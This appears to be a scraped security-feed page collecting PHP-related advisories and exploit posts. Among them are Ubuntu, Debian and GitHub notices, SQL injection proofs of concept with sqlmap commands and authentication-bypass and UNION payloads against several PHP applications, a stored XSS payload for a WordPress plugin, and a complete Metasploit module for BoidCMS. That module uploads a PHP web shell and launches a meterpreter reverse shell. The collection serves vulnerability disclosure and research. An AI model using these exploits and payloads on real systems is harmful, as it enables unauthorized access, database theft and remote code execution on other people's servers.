Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

An issue was discovered in phpseclib 1.x before 1.0.23, 2.x before 2.0.47, and 3.x before 3.0.36. An attacker can construct a malformed certificate containing an extremely large prime to cause a denial of service (CPU consumption for an isPrime primality check). NOTE: this issue was introduced when attempting to fix CVE-2023-27560.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-27354

**phpseclib a large prime can cause a denial of service**

High severity GitHub Reviewed Published Mar 2, 2024 to the GitHub Advisory Database • Updated Mar 4, 2024

**Package**

composer phpseclib/phpseclib (Composer)

**Affected versions**

\>= 1.0.0, < 1.0.23

\>= 2.0.0, < 2.0.47

\>= 3.0.0, < 3.0.36

**Patched versions**

1.0.23

2.0.47

3.0.36

**Description**

Published to the GitHub Advisory Database

Mar 2, 2024

GHSA-hg35-mp25-qf6h: phpseclib a large prime can cause a denial of service 

An issue was discovered in phpseclib 1.x before 1.0.23, 2.x before 2.0.47, and 3.x before 3.0.36. When processing the ASN.1 object identifier of a certificate, a sub identifier may be provided that leads to a denial of service (CPU consumption for decodeOID).

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-27355

**phpseclib does not properly limit the ASN1 OID length**

High severity GitHub Reviewed Published Mar 2, 2024 to the GitHub Advisory Database • Updated Mar 4, 2024

**Package**

composer phpseclib/phpseclib (Composer)

**Affected versions**

< 1.0.23

\>= 3.0.0, < 3.0.36

\>= 2.0.0, < 2.0.47

**Patched versions**

1.0.23

3.0.36

2.0.47

**Description**

Published to the GitHub Advisory Database

Mar 2, 2024

GHSA-jr22-8qgm-4q87: phpseclib does not properly limit the ASN1 OID length

Ubuntu Security Notice 6671-1 - It was discovered that php-nyholm-psr7 incorrectly parsed HTTP headers. A remote attacker could possibly use this issue to perform an HTTP header injection attack.

    ==========================================================================Ubuntu Security Notice USN-6671-1February 29, 2024php-nyholm-psr7 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS (Available with Ubuntu Pro)Summary:An header injection issue was fixed in php-nyholm-psr7.Software Description:- php-nyholm-psr7: A super lightweight PSR-7 implementationDetails:It was discovered that php-nyholm-psr7 incorrectly parsed HTTPheaders. A remote attacker could possibly use this issue to performan HTTP header injection attack.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS (Available with Ubuntu Pro):  php-nyholm-psr7                 1.5.0-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6671-1  CVE-2023-29197

Ubuntu Security Notice USN-6671-1

Ubuntu Security Notice 6670-1 - It was discovered that php-guzzlehttp-psr7 incorrectly parsed HTTP headers. A remote attacker could possibly use these issues to perform an HTTP header injection attack.

    ==========================================================================Ubuntu Security Notice USN-6670-1February 29, 2024php-guzzlehttp-psr7 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS (Available with Ubuntu Pro)- Ubuntu 20.04 LTSSummary:Several header injection issues were fixed in php-guzzlehttp-psr7.Software Description:- php-guzzlehttp-psr7: PSR-7 HTTP message libraryDetails:It was discovered that php-guzzlehttp-psr7 incorrectly parsed HTTPheaders. A remote attacker could possibly use these issues to performan HTTP header injection attack.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS (Available with Ubuntu Pro):  php-guzzlehttp-psr7             1.8.3-1ubuntu0.1~esm1Ubuntu 20.04 LTS:  php-guzzlehttp-psr7             1.4.2-0.1+deb10u2build0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6670-1  CVE-2022-24775, CVE-2023-29197Package Information:  https://launchpad.net/ubuntu/+source/php-guzzlehttp-psr7/1.4.2-0.1+deb10u2build0.20.04.1

Ubuntu Security Notice USN-6670-1

This Metasploit module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS versions 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BoidCMS Command Injection',        'Description' => %q{          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has          the GIF header, even if the file is a php file.        },        'License' => MSF_LICENSE,        'Author' => [          '1337kid',    # Discovery          'bwatters-r7' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-38836' ],          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']        ],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'nix Command',            {              'Platform' => ['linux', 'unix', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['windows', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',                'FETCH_WRITABLE_DIR' => '%TEMP%',                'FETCH_COMMAND' => 'CURL'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-13',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The path', '']),      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])    ])    @token = nil    @shell_filename = nil  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    if res && res.code == 200      title = res.get_html_document.xpath('//title').first.to_s      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')    end    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')  end  def extract_token(res)    token = nil    if res && res.code == 200      token = res.get_html_document.xpath("//input[@name='token']/@value").first    end    token  end  def cms_token    # initial login    return @token unless @token.nil?    vprint_status('Getting Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    @token = extract_token(res)  end  def cms_login?(login_token)    vprint_status('Logging into CMS')    cms_password = datastore['CMS_PASSWORD']    cms_username = datastore['CMS_USERNAME']    vars_form_data =      [        {          'name' => 'username',          'data' => cms_username        },        {          'name' => 'password',          'data' => cms_password        },        {          'name' => 'login',          'data' => 'Login'        },        {          'name' => 'token',          'data' => login_token.to_s        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def upload_php?(login_token, shell_filename)    vprint_status("Uploading PHP file #{shell_filename}")    vars_form_data =      [        {          'name' => 'file',          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',          'filename' => shell_filename        },        {          'name' => 'token',          'data' => login_token.to_s        },        {          'name' => 'upload',          'data' => 'Upload'        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_get' => {        'page' => 'media'      },      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def launch_payload(shell_filename, payload_cmd)    # send the command to the php page    vprint_status('launching Payload')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' =>        {          'cmd' => payload_cmd        }    )  end  def exploit    @shell_filename = datastore['PHP_FILENAME']    login_token = cms_token    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)    if upload_php?(login_token, @shell_filename)      register_file_for_cleanup @shell_filename      launch_payload(@shell_filename, payload.encoded)    else      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')    end  endend

BoidCMS 2.0.0 Command Injection

Membership Management System version 1.0 suffers from a remote SQL injection vulnerability.

    - Title: Membership Management System - SQL injection- Application: Hospital Management System- Date: 01.03.2024- Bugs: SQL injection- Exploit Author: SoSPiro- Vendor Homepage: https://codeastro.com/author/nbadmin/- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/- Version: 1.0- Tested on: Windows 10 64 bit Wampserver### Vulnerability Description:The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.### SQL Injection:This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.### Proof of Concept (PoC):Below is an example payload illustrating the SQL injection vulnerability:```email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=```In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.- Request Response[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)### Vulnerable Code Section:```php$email = $_POST['email'];$password = $_POST['password'];$hashed_password = md5($password);$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";```The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection

Membership Management System 1.0 SQL Injection

Debian Linux Security Advisory 5634-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5634-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 28, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1938 CVE-2024-1939Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), this problem has been fixed inversion 122.0.6261.94-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXfhAcACgkQZF0CR8Nudjfb1g/9H3MTUe56oMfSFIxki7qRpyzRcYvSVgJ79T3fX5t9+s9mEtyPa3z2rZFoI4+0VHnUOxEyRdsmd+hjrCr5gl2UW7NjkAczVLNjJ57TRtP0//81L5CjZXKPA/uJMTftRbdoKJG4+nC/G7dgwmxEq8bTjXZ4qvKTmEn6LlUuoxfwp1PS+r7d0MEHFSLQNh/wBUNGYshhGSWkMG18LV0+V/7tQeXvj2SgQCjJuhIm8hFcgwxAFZgCcLnNLfVFI/85GojBUpCPk7jo9A/n0GHoEQNdN/piddYbYrRWeiA+1xnEJb0DdXW7HFOIgb3NUXn4F7QpAVxxi4iZ5cSZCASzzvRl5bhj+JPl309GlhY/QLU1sXF5KES5Y21pi2uioKwZOFkuiTTuyYW9w6NAP8U0CdPgqWNsPQEbbWP5eRHWTQRIiurZ03tb+boyMUXfgdm6NxnU8Z/vmJhiSk9bYC4ZX8h25ukaGT1TTka+9Zo8Mpu7AClVDkKSzn/ybn+gbw7omtl3GLX+bdJEuTKAJTyxKhsb9emAtyBSlr14zT5eNg2RnSx35Xu+0axyX3WUKL57PBqT4k6L+5MMKutwW7CEPHpuSk1paEmw9fw0k3dlhbc26Jg5s5WHyKlUM12AuEI9FBybZM22QneUvVFN3EosxCOQGT+MvU7atVMh+Xzp2LW+20U==iYsy-----END PGP SIGNATURE-----

Debian Security Advisory 5634-1

WordPress IDonate Blood Request Management System plugin versions 1.8.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: IDonate – blood request management system <=1.8.1 - StoredCross-Site Scripting (Authenticated)# Date: 29-02-2024# Exploit Author: Laburity Research Team# Vendor Homepage: https://wordpress.org/plugins/idonate/# Version: <=1.8.1# Tested on: Firefox# Contact me: contact [at] laburity.com# Summary:A cross site scripting stored vulnerability has been identified inWordPress Plugin IDonate – blood request management system version lessthen 1.8.1. that allows Authenticated users to run arbitrary javascriptcode inside WordPress using blood request management system Plugin.# POC1- Navigate tohttp://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret keyand in Recaptcha Site key3- Click on save changes.4- While clicking on the payload text, XSS will trigger.# Vulnerable Code:```    public function idonate_recaptcha_secretkey_callback()    {if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){$secretkey = $this->general_options['idonate_recaptcha_secretkey'];}else{$secretkey = '';}//        printf(            '<input type="text" id="idonate_recaptcha_secretkey" value="%s"name="idonate_general_option_name[idonate_recaptcha_secretkey]"  />',            $secretkey        );    }```Secrets keys (idonate_recaptcha_secretkey) are printed without sanitization.

WordPress IDonate Blood Request Management System 1.8.1 Cross Site Scripting

Blood Bank version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Nitin Sharma in October of 2021.

    # Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability# Date: 2023-11-14# Exploit Author: Ersin Erenler# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip# Version: 1.0# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0# CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018-------------------------------------------------------------------------------1. Description:The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.Vulnerable File: /hospitalLogin.phpParameter Names: hemail, hpassword2. Proof of Concept:----------------------Execute sqlmap using either the 'hemain' or 'hpassword' parameter to retrieve the current database:sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-dbSQLMap Response:----------------------Parameter: hemail (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login-------------------------------------------------------------------------------1. Description:The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the databaseVulnerable File: /receiverLogin.phpParameter Names: remail, rpassword2. Proof of Concept:----------------------Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-dbsqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-dbSQLMap Response:-------------------------Parameter: remail (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login------Parameter: rpassword (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login----------------------------------------------------------------------------------# Description:The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.Vulnerable File: /receiverReg.phpParameter Name: remail# Proof of Concept:----------------------1. Save the POST request of receiverReg.php to a request.txt file---POST /bloodbank/file/receiverReg.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868Content-Length: 877Origin: http://localhostConnection: closeReferer: http://localhost/bloodbank/register.phpCookie: PHPSESSID=<some-cookie-value>Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="rname"test-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="rbg"A+-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="rcity"test-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="rphone"05555555555-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="remail"test@test-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="rpassword"test123-----------------------------2653697510272605730288393868Content-Disposition: form-data; name="rregister"Register-----------------------------2653697510272605730288393868-----2. Execute sqlmap using 'remail' parameter to retrieve the current database:sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db

Tag

#php